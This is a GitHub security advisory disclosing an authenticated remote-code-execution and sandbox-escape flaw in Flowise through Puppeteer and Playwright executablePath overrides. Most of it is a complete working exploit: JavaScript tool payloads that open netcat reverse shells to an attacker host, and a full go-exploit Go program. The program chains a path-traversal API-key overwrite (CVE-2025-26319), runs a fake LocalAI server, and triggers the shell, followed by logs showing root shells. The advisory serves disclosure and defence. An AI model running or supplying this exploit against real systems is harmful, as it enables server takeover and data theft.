Skip to content

Flowise Authenticated Command Execution and Sandbox Bypass via Puppeteer and Playwright Packages

High
HenryHengZJ published GHSA-5w3r-f6gm-c25w Oct 3, 2025

Package

Flowise

Affected versions

3.0.1

Patched versions

None

Description

Summary

Flowise is vulnerable to an authenticated remote code execution vulnerability and node VM sandbox escaped caused by insecure module use for the Puppeteer and Playwright packages.

Details

During triage and replication of CVE-2025-26319 I attempted to identify a generic path to RCE without relying on server specific configurations, which lead me to analyze the FlowiseAI nodevm package and it's usage by Flowise. I conducted an analysis of current and 2.2.6 versions of the allowed and integrated nodevm modules, which revealed usage of both Puppeteer and Playwright.

Both packages allow the creation of browser objects that allow control of binary paths during execution, allowing for a tool to be created that sets attacker controlled executables and parameters. When the tool is executed it will trigger the controlled data in the context of the host and bypass the sandbox restrictions, and allows for remote code execution.

This vulnerability requires authentication on post-CVE-2025-26319 systems and vulnerable versions can be chained for reliable exploitation.

An attack roughly follows this pattern:

  • Authenticate or bypass versions vulnerable to CVE-2025-26319
  • Create a tool that imports either of the puppeteer or playwright modules that overrides executablePath
  • Create a new Agentflow
    • Newer versions can just create a start -> tool flow with the custom tool defined above
    • 2.2.6 and older need a much more complicated set up as I couldn't find a trivial way to trigger tools without an LLM integration. I create a ChatLocalAI with an attacker controlled path (disabled streaming parameters), created a start node with the previous node as the model, created a custom tool with the created tool, attach a tool node with the custom tool, and finally end the sequence. This requires a ChatLocalAI handler by the attacker, which I did in my exploit.
  • Trigger the Agentflow from a chat

Below you can see a simple little example of both variants, showing the root of this bug.

The Playwright variant can be triggered with the following tool:

var playwright = require("playwright");
const browser = await playwright.chromium.launch({
  executablePath: '/usr/bin/nc',
  ignoreDefaultArgs: true,
  args: ['172.17.0.1','1337','-e','/bin/sh'],
  headless: true,
});

const page = await browser.newPage();

The Puppeteer variant can be triggered with the following tool (the puppeteer browser was cleaning the browser object and killing reverse shell as used in playwright, so I just wrapped it in a background process for demonstration):

var puppeteer = require("puppeteer");
const browser = await puppeteer.launch({
  executablePath: '/bin/sh',
  ignoreDefaultArgs: true,
  headless: 'shell',
  args: ['-c', 'nc 172.17.0.1 1337 -e /bin/sh &'],
});

const page = await browser.newPage();
await page.goto(url, { waitUntil: "networkidle" });
await browser.close();

Vulnerable endpoint and parameters:

  • POST /api/v1/tools - JSON object func variable

A few notes on exploitation:

  • 2.2.6 versions I had to create "Agent Flows" containing an LocalAI LLM agent, which required setting up a HTTP server that would mock responses from the chat completion. This interestingly made exploitation harder in older versions and the latest version could just wire a tool directly to chat.
  • I hardcoded the netcat callback to match the path from the Docker deployment, so it might need modified.
  • api.json overrides are destructive and will invalidate previous keys.

PoC

Evidence/shells first:

2.2.6 with authentication bypass:
Exploiting 2.2.6 Flowise with auth bypass

3.0.1 with authenticated user credentials:
Exploiting 3.0.1 Flowise with valid credentials

The full proof-of-concept utilizes go-exploit, and is available below with full integration for the 2 variants, as well as CVE-2025-26319 bypasses:

package main

import (
	"crypto/rand"
	_ "embed"
	"encoding/base64"
	"encoding/hex"
	"encoding/json"
	"fmt"
	"net/http"
	"path/filepath"
	"strings"

	"github.com/Masterminds/semver"
	"github.com/buger/jsonparser"
	"github.com/google/uuid"
	"github.com/vulncheck-oss/go-exploit"
	"github.com/vulncheck-oss/go-exploit/c2"
	"github.com/vulncheck-oss/go-exploit/config"
	"github.com/vulncheck-oss/go-exploit/output"
	"github.com/vulncheck-oss/go-exploit/payload/reverse"
	"github.com/vulncheck-oss/go-exploit/protocol"
	"github.com/vulncheck-oss/go-exploit/random"
	"golang.org/x/crypto/scrypt"
)

type FowiseAuthRCE struct{}

var (
	globalVersion string
	username      string
	password      string
	apiKey        string
	variant       string
	httpAddr      string
	httpPort      uint
)

type APIJSON struct {
	KeyName   string `json:"keyName"`
	APIKey    string `json:"apiKey"`
	APISecret string `json:"apiSecret"`
	CreatedAt string `json:"createdAt"`
	ID        string `json:"id"`
}

// Works in both old and new versions, I'd rather have marshaled this but it was getting messy
var (
	toolPlaywrightPayload = `{"name":"vulncheck_rce","description":"vulncheck_rce","color":"linear-gradient(rgb(107,26,190), rgb(114,9,104))","schema":"[]","func":"var playwright = require(\"playwright\");\nconst browser = await playwright.chromium.launch({\n  executablePath: '%s',\n  ignoreDefaultArgs: true,\n  args: [%s],\n  headless: true,\n});\n\nconst page = await browser.newPage();\nawait page.goto(url, { waitUntil: \"networkidle\" });\nawait browser.close();","iconSrc":""}`
	toolPuppeteerPayload  = `{"name":"vulncheck_rce","description":"vulncheck_rce","color":"linear-gradient(rgb(107,26,190), rgb(114,9,104))","schema":"[]","func":"var puppeteer = require(\"puppeteer\");\nconst browser = await puppeteer.launch({\n  executablePath: '%s',\n  ignoreDefaultArgs: true,\n  headless: 'shell',\n  args: [%s],\n});\n\nconst page = await browser.newPage();\nawait page.goto(url, { waitUntil: \"networkidle\" });\nawait browser.close();","iconSrc":""}`

	// Fmt: FlowName, HTTPCallBackURL, ToolUUID
	//go:embed OldAgentChatflow.json
	toolOldAgentFlowPayload string

	// Fmt: FlowName, ToolUUID
	//go:embed NewAgentChatflow.json
	toolNewAgentFlowPayload string

	// non-streaming, this could be cleaned up to be fully randomized I just ripped it from OpenAI docs for localAI
	LLMCompletionResponse = `{"choices":[{"finish_reason":"tool_calls","index":0,"logprobs":null,"message":{"content":null,"role":"assistant","tool_calls":[{"function":{"arguments":"{\n\"location\": \"Boston, MA\"\n}","name":"vulncheck_rce"},"id":"call_abc123","type":"function"}]}}],"created":1699896916,"id":"chatcmpl-abc123","model":"test","object":"chat.completion","usage":{"completion_tokens":17,"completion_tokens_details":{"accepted_prediction_tokens":0,"reasoning_tokens":0,"rejected_prediction_tokens":0},"prompt_tokens":82,"total_tokens":99}}`
)

var (
	EndpointAuth       = `/api/v1/auth/login`
	EndpointTool       = `/api/v1/tools`
	EndpointChatflow   = `/api/v1/chatflows`              // POST
	EndpointPrediction = `/api/v1/internal-prediction/%s` // POST and UUID of chatflow
)

func generatePayload(conf *config.Config) (string, bool) {
	generated := ""

	switch conf.C2Type {
	case c2.SimpleShellServer:
		p := reverse.Netcat.Gaping(conf.Lhost, conf.Lport)
		switch variant {
		case "playwright":
			// Playwright variant uses argv style string splitting
			n := strings.Split(p, " ")
			bin := "/usr/bin/" + n[0]
			args := ""
			for _, arg := range n[1:] {
				args += `'` + arg + `',`
			}
			args = strings.TrimRight(args, ",")
			generated = fmt.Sprintf(toolPlaywrightPayload, bin, args)
		case "puppeteer":
			// The puppeteer variant was struggling to keep a shell open due to launch conditions, I was
			// lazy and opted for just doing a sh -c with a banckground process
			bin := `/bin/sh`
			args := fmt.Sprintf(`'-c', '%s &'`, p)
			generated = fmt.Sprintf(toolPuppeteerPayload, bin, args)
		default:
			output.PrintError("Variant must be either 'playwright' or 'puppeteer'")

			return "", false
		}

		return generated, true

	default:
		output.PrintError("Invalid payload")

		return generated, false
	}
}

func (sploit FowiseAuthRCE) ValidateTarget(conf *config.Config) bool {
	url := protocol.GenerateURL(conf.Rhost, conf.Rport, conf.SSL, "/")
	resp, body, ok := protocol.HTTPGetCache(url)
	if !ok || resp.StatusCode != 200 {
		return false
	}

	return strings.Contains(body, `<title>Flowise -`)
}

func (sploit FowiseAuthRCE) CheckVersion(conf *config.Config) exploit.VersionCheckType {
	url := protocol.GenerateURL(conf.Rhost, conf.Rport, conf.SSL, `/api/v1/version`)
	resp, body, ok := protocol.HTTPGetCache(url)
	if !ok || resp.StatusCode != 200 {
		return exploit.Unknown
	}
	var dat map[string]interface{}
	if err := json.Unmarshal([]byte(body), &dat); err != nil {
		return exploit.Unknown
	}
	version, ok := dat["version"]
	if !ok {
		return exploit.Unknown
	}
	exploit.StoreVersion(conf, version.(string))
	globalVersion = version.(string)
	c, err := semver.NewConstraint("<= 3.0.1")
	if err != nil {
		return exploit.Unknown
	}
	v, err := semver.NewVersion(version.(string))
	if err != nil {
		return exploit.Unknown
	}
	if c.Check(v) {
		return exploit.Vulnerable
	}

	return exploit.NotVulnerable
}

func generateAPIKey() (APIJSON, bool) {
	salt := random.RandHex(8)
	randomBytes := make([]byte, 32)
	_, err := rand.Read(randomBytes)
	if err != nil {
		output.PrintError("Error generating random bytes: %v", err)

		return APIJSON{}, false
	}
	apiKey := strings.ReplaceAll(base64.URLEncoding.EncodeToString(randomBytes), `=`, ``)
	dk, err := scrypt.Key([]byte(apiKey), []byte(salt), 16384, 8, 1, 64)
	if err != nil {
		output.PrintfError("Error run scrypt: %v", err)

		return APIJSON{}, false
	}
	output.PrintfDebug("apiKey: %s", apiKey)
	output.PrintfDebug("apiSecret: %s.%s", hex.EncodeToString(dk), salt)

	return APIJSON{
		KeyName:   random.RandLetters(8),
		APIKey:    apiKey,
		APISecret: hex.EncodeToString(dk) + `.` + salt,
		CreatedAt: random.RandDigits(10),
		ID:        random.RandDigits(2),
	}, true
}

func writeAPIKey(conf *config.Config, path string) (string, bool) {
	maxPath := 15
	if path == "" {
		path = "/root/.flowise/api.json"
	}
	k, ok := generateAPIKey()
	if !ok {
		return "", false
	}
	output.PrintfStatus("Generated API key: %s", k.APIKey)
	jsonData, err := json.Marshal([]APIJSON{k})
	if err != nil {
		return "", false
	}

	base := filepath.Base(path)
	dir := strings.ReplaceAll(strings.TrimLeft(filepath.Dir(filepath.Dir(path))+"/", `/`), `/`, `%2f`)
	topDir := "/" + filepath.Base(filepath.Dir(path))
	traversal := `..%2f`
	for range maxPath {
		output.PrintfDebug("Attempting to write to: %s", `/api/v1/attachments/`+traversal+dir+topDir)
		url := protocol.GenerateURL(conf.Rhost, conf.Rport, conf.SSL, `/api/v1/attachments/`+traversal+dir+topDir)
		form, formWriter := protocol.MultipartCreateForm()
		protocol.MultipartAddFile(
			formWriter,
			"files",
			base,
			"text/plain",
			string(jsonData),
		)
		formWriter.Close()

		headers := map[string]string{
			"Content-Type": formWriter.FormDataContentType(),
		}
		_, _, ok := protocol.HTTPSendAndRecvWithHeaders("POST", url, form.String(), headers)
		if !ok {
			return "", false
		}
		traversal += `..%2f`
	}

	return k.APIKey, true
}

func localAIHTTPServer(wait <-chan struct{}) {
	mux := http.NewServeMux()
	mux.HandleFunc("POST /api/chat/completions", func(w http.ResponseWriter, _ *http.Request) {
		output.PrintStatus("Receieved completion request")
		w.Header().Add("Content-Type", "application/json")
		fmt.Fprint(w, LLMCompletionResponse)
	})
	server := &http.Server{
		Addr:    fmt.Sprintf("%s:%d", httpAddr, httpPort),
		Handler: mux,
	}
	go func() {
		<-wait
		output.PrintStatus("Shutting down http server")
		if err := server.Close(); err != nil {
			output.PrintfError("HTTP close error: %v", err)
		}
	}()
	if err := server.ListenAndServe(); err != nil {
		output.PrintfError("HTTP Listen error: %v", err)

		return
	}
}

func createTool(conf *config.Config, payload string, initialHeaders map[string]string) (string, bool) {
	url := protocol.GenerateURL(conf.Rhost, conf.Rport, conf.SSL, EndpointTool)
	resp, body, ok := protocol.HTTPSendAndRecvWithHeaders("POST", url, payload, initialHeaders)
	if !ok || resp.StatusCode != 200 {
		output.PrintfError("Unexpected HTTP response, could not create a new tool: body=%s", body)

		return "", false
	}
	id, err := jsonparser.GetString([]byte(body), "id")
	if err != nil {
		output.PrintfError("Unexpected JSON response, could not create a new tool: %s", err.Error())

		return "", false
	}

	return id, true
}

func createOldChatFlow(conf *config.Config, toolID string, basePath string, initialHeaders map[string]string) (string, bool) {
	payload := fmt.Sprintf(toolOldAgentFlowPayload, random.RandLetters(8), basePath, toolID)
	url := protocol.GenerateURL(conf.Rhost, conf.Rport, conf.SSL, EndpointChatflow)
	resp, body, ok := protocol.HTTPSendAndRecvWithHeaders("POST", url, payload, initialHeaders)
	if !ok || resp.StatusCode != 200 {
		output.PrintError("Unexpected HTTP response, could not create a new chat flow")

		return "", false
	}
	id, err := jsonparser.GetString([]byte(body), "id")
	if err != nil {
		output.PrintfError("Unexpected JSON response, could not create a new chat flow: %s", err.Error())

		return "", false
	}

	return id, true
}

func createNewChatFlow(conf *config.Config, toolID string, initialHeaders map[string]string) (string, bool) {
	payload := fmt.Sprintf(toolNewAgentFlowPayload, random.RandLetters(8), toolID)
	url := protocol.GenerateURL(conf.Rhost, conf.Rport, conf.SSL, EndpointChatflow)
	resp, body, ok := protocol.HTTPSendAndRecvWithHeaders("POST", url, payload, initialHeaders)
	if !ok || resp.StatusCode != 200 {
		output.PrintError("Unexpected HTTP response, could not create a new chat flow")

		return "", false
	}
	id, err := jsonparser.GetString([]byte(body), "id")
	if err != nil {
		output.PrintfError("Unexpected JSON response, could not create a new chat flow: %s", err.Error())

		return "", false
	}

	return id, true
}

func sendChat(conf *config.Config, chatID string, initialHeaders map[string]string) bool {
	type ChatRequest struct {
		Question  string `json:"question"`
		ChatID    string `json:"chatId"`
		Streaming bool   `json:"streaming"`
	}
	payload, err := json.Marshal(&ChatRequest{
		Question:  random.RandLettersRange(10, 50),
		ChatID:    uuid.New().String(),
		Streaming: true,
	})
	if err != nil {
		output.PrintError("Could not marshal chat request, how did this happen?")

		return false
	}
	url := protocol.GenerateURL(conf.Rhost, conf.Rport, conf.SSL, fmt.Sprintf(EndpointPrediction, chatID))
	resp, _, ok := protocol.HTTPSendAndRecvWithHeaders("POST", url, string(payload), initialHeaders)
	if !ok || resp.StatusCode != 200 {
		output.PrintError("Unexpected HTTP response, could not send to chat")

		return false
	}

	return true
}

func authenticate(conf *config.Config, username, password string, initialHeaders map[string]string) (string, bool) {
	type AuthRequest struct {
		Email    string `json:"email"`
		Password string `json:"password"`
	}
	payload, err := json.Marshal(&AuthRequest{
		Email:    username,
		Password: password,
	})
	if err != nil {
		output.PrintError("Could not marshal login request, how did this happen?")

		return "", false
	}
	url := protocol.GenerateURL(conf.Rhost, conf.Rport, conf.SSL, EndpointAuth)
	resp, _, ok := protocol.HTTPSendAndRecvWithHeaders("POST", url, string(payload), initialHeaders)
	if !ok || resp.StatusCode != 200 {
		output.PrintError("Unexpected HTTP response, could not send to chat")

		return "", false
	}

	return protocol.CookieString(resp.Cookies()), true
}

func (sploit FowiseAuthRCE) RunExploit(conf *config.Config) bool {
	generated, ok := generatePayload(conf)
	output.PrintfDebug("Payload: %s", generated)
	if !ok {
		return false
	}
	if globalVersion == "" {
		_ = sploit.CheckVersion(conf)
	}
	c, err := semver.NewConstraint("<= 2.2.6")
	if err != nil {
		return false
	}
	v, err := semver.NewVersion(globalVersion)
	if err != nil {
		return false
	}
	// All requests are application/json mimetype
	headers := map[string]string{
		"Content-Type": "application/json",
	}
	older := false
	if c.Check(v) {
		older = true
		output.PrintStatus("Older Flowise version requires LocalAI response, spinning up webserver")
		if httpAddr == "" || httpPort <= 0 {
			output.PrintError("-httpAddr and -httpPort must be set for listener on target versions <= 2.2.6")

			return false
		}
		wait := make(chan struct{}, 1)
		go localAIHTTPServer(wait)
		defer func() { wait <- struct{}{} }()
	}

	if !older && (username == "" || password == "" && apiKey == "") {
		output.PrintError("Exploiting newer version, requires username/password or API key")

		return false
	}
	if apiKey == "" && older {
		// Do the auth bypass and do RCE
		output.PrintfStatus("Oudated Flowise version detected, exploiting CVE-2025-26319 for unauth RCE")
		// Technically the deployment path needs to be known, but in docker and some cloud configs this
		// tends to stay in `/root/.flowise`. Default to that.
		key, ok := writeAPIKey(conf, "")
		if !ok {
			return false
		}
		apiKey = key
	}

	if apiKey != "" {
		headers["Authorization"] = "Bearer " + apiKey
	} else {
		headers["x-request-from"] = "internal"
		if older {
			headers["Authorization"] = protocol.BasicAuth(username, password)
		} else {
			output.PrintStatus("Logging into the application")
			cookies, ok := authenticate(conf, username, password, headers)
			if !ok {
				return false
			}
			headers["Cookie"] = cookies
		}
	}
	output.PrintStatus("Creating Flowise tool with JavaScript VM bypass")
	toolID, ok := createTool(conf, generated, headers)
	if !ok {
		return false
	}
	output.PrintfDebug("Created tool with ID: %s", toolID)
	output.PrintStatus("Creating Flowise chat flow")
	var chatID string
	if older {
		httpURL := protocol.GenerateURL(httpAddr, int(httpPort), false, "/api/")
		chatID, ok = createOldChatFlow(conf, toolID, httpURL, headers)
		if !ok {
			return false
		}
	} else {
		chatID, ok = createNewChatFlow(conf, toolID, headers)
		if !ok {
			return false
		}
	}
	output.PrintfDebug("Created chatflow with ID: %s", chatID)
	output.PrintStatus("Triggering chat and tool, expect a callback")

	return sendChat(conf, chatID, headers)
}

func main() {
	supportedC2 := []c2.Impl{
		c2.SimpleShellServer,
	}
	conf := config.NewRemoteExploit(
		config.ImplementedFeatures{AssetDetection: true, VersionScanning: true, Exploitation: true},
		config.CodeExecution, supportedC2,
		"FlowiseAI", []string{"Flowise"},
		[]string{"cpe:2.3:a:flowiseai:flowise"}, "VC-2025-1", "HTTP", 3000)

	conf.CreateStringVarFlag(&username, "username", "", "Username for authentication")
	conf.CreateStringVarFlag(&password, "password", "", "Password for authentication")
	conf.CreateStringVarFlag(&apiKey, "api-key", "", "API key for authentication (takes precedence over username/password auth")
	conf.CreateStringVarFlag(&variant, "variant", "playwright", "Variant of the exploit (`playwright` or `puppeteer`)")
	conf.CreateStringVarFlag(&httpAddr, "httpAddr", "", "Listening address HTTP web server needed for LocalAI fake responses for older Flowise versions")
	conf.CreateUintVarFlag(&httpPort, "httpPort", 0, "Listening port for HTTP web server")
	sploit := FowiseAuthRCE{}
	exploit.RunProgram(sploit, conf)
}

Exploiting 2.2.6 with CVE-2025-26319 integration

The following shows 2.2.6 being exploited with the authentication bypass.

poptart@grimm $ ./build/vc-2025-1_linux-amd64 -rhost 10.0.1.10 -rport 3000 -v -c -e -lhost 172.17.0.1 -lport 1337 -httpPort 8081 -httpAddr 172.17.0.1 -variant puppeteer
time=2025-06-05T16:07:42.350-06:00 level=STATUS msg="Starting listener on 172.17.0.1:1337"
time=2025-06-05T16:07:42.350-06:00 level=STATUS msg="Starting target" index=0 host=10.0.1.10 port=3000 ssl=false "ssl auto"=false
time=2025-06-05T16:07:42.350-06:00 level=STATUS msg="Validating FlowiseAI Flowise target" host=10.0.1.10 port=3000
time=2025-06-05T16:07:42.352-06:00 level=SUCCESS msg="Target verification succeeded!" host=10.0.1.10 port=3000 verified=true
time=2025-06-05T16:07:42.352-06:00 level=STATUS msg="Running a version check on the remote target" host=10.0.1.10 port=3000
time=2025-06-05T16:07:42.353-06:00 level=VERSION msg="The reported version is 2.2.6" host=10.0.1.10 port=3000 version=2.2.6
time=2025-06-05T16:07:42.353-06:00 level=SUCCESS msg="The target appears to be a vulnerable version!" host=10.0.1.10 port=3000 vulnerable=yes
time=2025-06-05T16:07:42.353-06:00 level=STATUS msg="Older Flowise version requires LocalAI response, spinning up webserver"
time=2025-06-05T16:07:42.353-06:00 level=STATUS msg="Oudated Flowise version detected, exploiting CVE-2025-26319 for unauth RCE"
time=2025-06-05T16:07:42.381-06:00 level=STATUS msg="Generated API key: PKRpepw-fah2GjzWrd8TylVZ0m1o27KJXg6izwi6Efg"
time=2025-06-05T16:07:42.404-06:00 level=STATUS msg="Creating Flowise tool with JavaScript VM bypass"
time=2025-06-05T16:07:42.441-06:00 level=STATUS msg="Creating Flowise chat flow"
time=2025-06-05T16:07:42.474-06:00 level=STATUS msg="Triggering chat and tool, expect a callback"
time=2025-06-05T16:07:42.525-06:00 level=STATUS msg="Receieved completion request"
time=2025-06-05T16:07:42.614-06:00 level=SUCCESS msg="Caught new shell from 10.0.1.10:36976"
time=2025-06-05T16:07:42.614-06:00 level=STATUS msg="Active shell from 10.0.1.10:36976"
time=2025-06-05T16:07:42.615-06:00 level=SUCCESS msg="Exploit successfully completed" exploited=true
time=2025-06-05T16:07:42.615-06:00 level=STATUS msg="Shutting down http server"
time=2025-06-05T16:07:42.615-06:00 level=ERROR msg="HTTP Listen error: http: Server closed"
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
exit
time=2025-06-05T16:07:44.869-06:00 level=STATUS msg="C2 received shutdown, killing server and client sockets for shell server"
time=2025-06-05T16:07:44.869-06:00 level=STATUS msg="Connection closed for shell server: 10.0.1.10:36976"
time=2025-06-05T16:07:44.869-06:00 level=STATUS msg="C2 server exited"

Debug output shows a bit more detail:

poptart@grimm $ ./build/vc-2025-1_linux-amd64 -rhost 10.0.1.10 -rport 3000 -v -c -e -lhost 172.17.0.1 -lport 1337 -httpPort 8081 -httpAddr 172.17.0.1 -ell DEBUG
time=2025-06-05T16:07:34.559-06:00 level=STATUS msg="Starting listener on 172.17.0.1:1337"
time=2025-06-05T16:07:34.559-06:00 level=STATUS msg="Starting target" index=0 host=10.0.1.10 port=3000 ssl=false "ssl auto"=false
time=2025-06-05T16:07:34.559-06:00 level=STATUS msg="Validating FlowiseAI Flowise target" host=10.0.1.10 port=3000
time=2025-06-05T16:07:34.561-06:00 level=SUCCESS msg="Target verification succeeded!" host=10.0.1.10 port=3000 verified=true
time=2025-06-05T16:07:34.561-06:00 level=STATUS msg="Running a version check on the remote target" host=10.0.1.10 port=3000
time=2025-06-05T16:07:34.563-06:00 level=VERSION msg="The reported version is 2.2.6" host=10.0.1.10 port=3000 version=2.2.6
time=2025-06-05T16:07:34.563-06:00 level=SUCCESS msg="The target appears to be a vulnerable version!" host=10.0.1.10 port=3000 vulnerable=yes
time=2025-06-05T16:07:34.563-06:00 level=DEBUG msg="Payload: {\"name\":\"vulncheck_rce\",\"description\":\"vulncheck_rce\",\"color\":\"linear-gradient(rgb(107,26,190), rgb(114,9,104))\",\"schema\":\"[]\",\"func\":\"var playwright = require(\\\"playwright\\\");\\nconst browser = await playwright.chromium.launch({\\n  executablePath: '/usr/bin/nc',\\n  ignoreDefaultArgs: true,\\n  args: ['172.17.0.1','1337','-e','/bin/sh'],\\n  headless: true,\\n});\\n\\nconst page = await browser.newPage();\\nawait page.goto(url, { waitUntil: \\\"networkidle\\\" });\\nawait browser.close();\",\"iconSrc\":\"\"}"
time=2025-06-05T16:07:34.563-06:00 level=STATUS msg="Older Flowise version requires LocalAI response, spinning up webserver"
time=2025-06-05T16:07:34.563-06:00 level=STATUS msg="Oudated Flowise version detected, exploiting CVE-2025-26319 for unauth RCE"
time=2025-06-05T16:07:34.591-06:00 level=DEBUG msg="apiKey: lIUFhyNjQGbm821mQneGcCvwhZ5dwdFHwpEh8yFrBwc"
time=2025-06-05T16:07:34.591-06:00 level=DEBUG msg="apiSecret: 85d98a0ecab2d07aa4955fdca4985d37ce4ddb8c1af8868b2cdf78bb5acd505c4538f73671155fe09cc64e0ee39815ca642fca391082834e9f369f77e3bf742f.9e377135"
time=2025-06-05T16:07:34.591-06:00 level=STATUS msg="Generated API key: lIUFhyNjQGbm821mQneGcCvwhZ5dwdFHwpEh8yFrBwc"
time=2025-06-05T16:07:34.591-06:00 level=DEBUG msg="Attempting to write to: /api/v1/attachments/..%2froot%2f/.flowise"
time=2025-06-05T16:07:34.594-06:00 level=DEBUG msg="Attempting to write to: /api/v1/attachments/..%2f..%2froot%2f/.flowise"
time=2025-06-05T16:07:34.596-06:00 level=DEBUG msg="Attempting to write to: /api/v1/attachments/..%2f..%2f..%2froot%2f/.flowise"
time=2025-06-05T16:07:34.597-06:00 level=DEBUG msg="Attempting to write to: /api/v1/attachments/..%2f..%2f..%2f..%2froot%2f/.flowise"
time=2025-06-05T16:07:34.599-06:00 level=DEBUG msg="Attempting to write to: /api/v1/attachments/..%2f..%2f..%2f..%2f..%2froot%2f/.flowise"
time=2025-06-05T16:07:34.600-06:00 level=DEBUG msg="Attempting to write to: /api/v1/attachments/..%2f..%2f..%2f..%2f..%2f..%2froot%2f/.flowise"
time=2025-06-05T16:07:34.602-06:00 level=DEBUG msg="Attempting to write to: /api/v1/attachments/..%2f..%2f..%2f..%2f..%2f..%2f..%2froot%2f/.flowise"
time=2025-06-05T16:07:34.603-06:00 level=DEBUG msg="Attempting to write to: /api/v1/attachments/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2froot%2f/.flowise"
time=2025-06-05T16:07:34.604-06:00 level=DEBUG msg="Attempting to write to: /api/v1/attachments/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2froot%2f/.flowise"
time=2025-06-05T16:07:34.606-06:00 level=DEBUG msg="Attempting to write to: /api/v1/attachments/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2froot%2f/.flowise"
time=2025-06-05T16:07:34.607-06:00 level=DEBUG msg="Attempting to write to: /api/v1/attachments/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2froot%2f/.flowise"
time=2025-06-05T16:07:34.609-06:00 level=DEBUG msg="Attempting to write to: /api/v1/attachments/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2froot%2f/.flowise"
time=2025-06-05T16:07:34.610-06:00 level=DEBUG msg="Attempting to write to: /api/v1/attachments/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2froot%2f/.flowise"
time=2025-06-05T16:07:34.612-06:00 level=DEBUG msg="Attempting to write to: /api/v1/attachments/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2froot%2f/.flowise"
time=2025-06-05T16:07:34.613-06:00 level=DEBUG msg="Attempting to write to: /api/v1/attachments/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2froot%2f/.flowise"
time=2025-06-05T16:07:34.614-06:00 level=STATUS msg="Creating Flowise tool with JavaScript VM bypass"
time=2025-06-05T16:07:34.653-06:00 level=DEBUG msg="Created tool with ID: 67b6e4d9-d1bd-4ab2-ab25-f8ae0463acb3"
time=2025-06-05T16:07:34.653-06:00 level=STATUS msg="Creating Flowise chat flow"
time=2025-06-05T16:07:34.690-06:00 level=DEBUG msg="Created chatflow with ID: 7d705ac0-be5d-4fd4-a908-0b925676f36f"
time=2025-06-05T16:07:34.690-06:00 level=STATUS msg="Triggering chat and tool, expect a callback"
time=2025-06-05T16:07:34.747-06:00 level=STATUS msg="Receieved completion request"
time=2025-06-05T16:07:34.758-06:00 level=SUCCESS msg="Caught new shell from 10.0.1.10:36966"
time=2025-06-05T16:07:34.758-06:00 level=STATUS msg="Active shell from 10.0.1.10:36966"
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
exit
time=2025-06-05T16:07:36.715-06:00 level=STATUS msg="C2 received shutdown, killing server and client sockets for shell server"
time=2025-06-05T16:07:36.715-06:00 level=STATUS msg="Connection closed for shell server: 10.0.1.10:36966"
time=2025-06-05T16:07:36.715-06:00 level=STATUS msg="C2 server exited"
time=2025-06-05T16:07:36.717-06:00 level=SUCCESS msg="Exploit successfully completed" exploited=true

Exploiting 3.0.1 with Valid Credentials

The following shows the Puppeteer variant exploitng the Docker latest (3.0.1) with setup credentials and both variants:

poptart@grimm $ ./build/vc-2025-1_linux-amd64 -rhost 10.0.1.10 -rport 3000 -v -c -e -lhost 172.17.0.1 -lport 1337 -httpPort 8081 -httpAddr 172.17.0.1 -username [email protected] -password 'Password1!' -ell DEBUG -variant puppeteer
time=2025-06-05T16:05:41.175-06:00 level=STATUS msg="Starting listener on 172.17.0.1:1337"
time=2025-06-05T16:05:41.176-06:00 level=STATUS msg="Starting target" index=0 host=10.0.1.10 port=3000 ssl=false "ssl auto"=false
time=2025-06-05T16:05:41.176-06:00 level=STATUS msg="Validating FlowiseAI Flowise target" host=10.0.1.10 port=3000
time=2025-06-05T16:05:41.177-06:00 level=SUCCESS msg="Target verification succeeded!" host=10.0.1.10 port=3000 verified=true
time=2025-06-05T16:05:41.177-06:00 level=STATUS msg="Running a version check on the remote target" host=10.0.1.10 port=3000
time=2025-06-05T16:05:41.179-06:00 level=VERSION msg="The reported version is 3.0.1" host=10.0.1.10 port=3000 version=3.0.1
time=2025-06-05T16:05:41.179-06:00 level=SUCCESS msg="The target appears to be a vulnerable version!" host=10.0.1.10 port=3000 vulnerable=yes
time=2025-06-05T16:05:41.179-06:00 level=DEBUG msg="Payload: {\"name\":\"vulncheck_rce\",\"description\":\"vulncheck_rce\",\"color\":\"linear-gradient(rgb(107,26,190), rgb(114,9,104))\",\"schema\":\"[]\",\"func\":\"var puppeteer = require(\\\"puppeteer\\\");\\nconst browser = await puppeteer.launch({\\n  executablePath: '/bin/sh',\\n  ignoreDefaultArgs: true,\\n  headless: 'shell',\\n  args: ['-c', 'nc 172.17.0.1 1337 -e /bin/sh &'],\\n});\\n\\nconst page = await browser.newPage();\\nawait page.goto(url, { waitUntil: \\\"networkidle\\\" });\\nawait browser.close();\",\"iconSrc\":\"\"}"
time=2025-06-05T16:05:41.179-06:00 level=STATUS msg="Logging into the application"
time=2025-06-05T16:05:41.210-06:00 level=STATUS msg="Creating Flowise tool with JavaScript VM bypass"
time=2025-06-05T16:05:41.220-06:00 level=DEBUG msg="Created tool with ID: c246a1f8-7e17-40ec-b521-4ff7352a1c1e"
time=2025-06-05T16:05:41.220-06:00 level=STATUS msg="Creating Flowise chat flow"
time=2025-06-05T16:05:41.231-06:00 level=DEBUG msg="Created chatflow with ID: bade8e0c-c3a7-4a75-9d7e-782eb3a34e1b"
time=2025-06-05T16:05:41.231-06:00 level=STATUS msg="Triggering chat and tool, expect a callback"
time=2025-06-05T16:05:41.249-06:00 level=SUCCESS msg="Caught new shell from 10.0.1.10:37866"
time=2025-06-05T16:05:41.249-06:00 level=STATUS msg="Active shell from 10.0.1.10:37866"
time=2025-06-05T16:05:41.258-06:00 level=SUCCESS msg="Exploit successfully completed" exploited=true
id
